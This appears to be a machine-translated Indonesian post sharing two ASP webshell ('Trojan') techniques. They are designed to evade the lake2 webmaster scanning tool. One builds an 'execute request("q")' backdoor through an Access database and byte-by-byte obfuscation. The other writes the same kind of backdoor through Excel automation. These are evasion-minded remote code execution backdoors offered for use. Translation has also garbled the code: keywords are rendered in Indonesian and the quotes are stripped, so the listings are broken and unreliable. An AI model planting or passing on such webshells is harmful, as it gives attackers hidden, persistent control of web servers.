Dua Trojan ASP yang tidak konvensional ditulis oleh hanxiaolian untuk menghindari asisten manajemen webmaster ASP lake2
Ditulis untuk menghindari asisten manajemen webmaster ASP lake2...
1. Seekor kuda poni yang melewati pemindaian Trojan Lake2 Asp
Copy kode kodenya sebagai berikut:
<%
set c = CreateObject(ADOX.Katalog)
c.create(Provider=Microsoft.Jet.OLEDB.4.0;Sumber Data=&Server.MapPath(a.asp))
atur c = Tidak ada
c&Server.MapPath(a.asp)
setel koneksi=server.buat objek(Adodb.Koneksi)
koneksi.buka koneksi
samb.eksekusi(buat tabel nomm(nomuma oleobject))
set rs=server.createobject(adodb.recordset)
sql=PILIH * DARI nomm
rs.open sql,sambungan,1,3
rs.tambahkanbaru
rs (nomuma).appendchunk(chrB(asc(<))&chrB(asc(%))&chrB(asc (e))&chrB
(asc(x))&chrB(asc(e))&chrB(asc(c))&chrB(asc (u))&chrB(asc(t))&chrB(asc
(e))&chrB(asc(+))&chrB(asc (r))&chrB(asc(e))&chrB(asc(q))&chrB(asc
(u))&chrB(asc (e))&chrB(asc(s))&chrB(asc(t))&chrB(asc(())&chrB(34)
&chrB(asc(q))&chrB(34)&chrB(asc()))&chrB(asc(%))& chrB(asc(>)))
rs.update
rs.tutup
atur rs=tidak ada
samb.tutup
setel samb=tidak ada
%>
2.xls versi asp webshell
Copy kode kodenya sebagai berikut:
<%
Setel xlA = Server.CreateObject(Excel.Application)
xlA.Terlihat = Salah
xlA.Buku Kerja.Tambahkan
Atur xlLembar Kerja = xlA.Lembar Kerja(1)
xlLembar Kerja.Sel(1,1).Nilai = <%ex&ec&ute(permintaan(q))+chr(37)+>
'strFile = d:/test.asp
strFile = Server.MapPath(test.asp)
xlWorkSheet.Simpan Sebagai strFile
xlA.Keluar
Setel xlWorksheet = Tidak Ada
Tetapkan xlA = Tidak ada
%>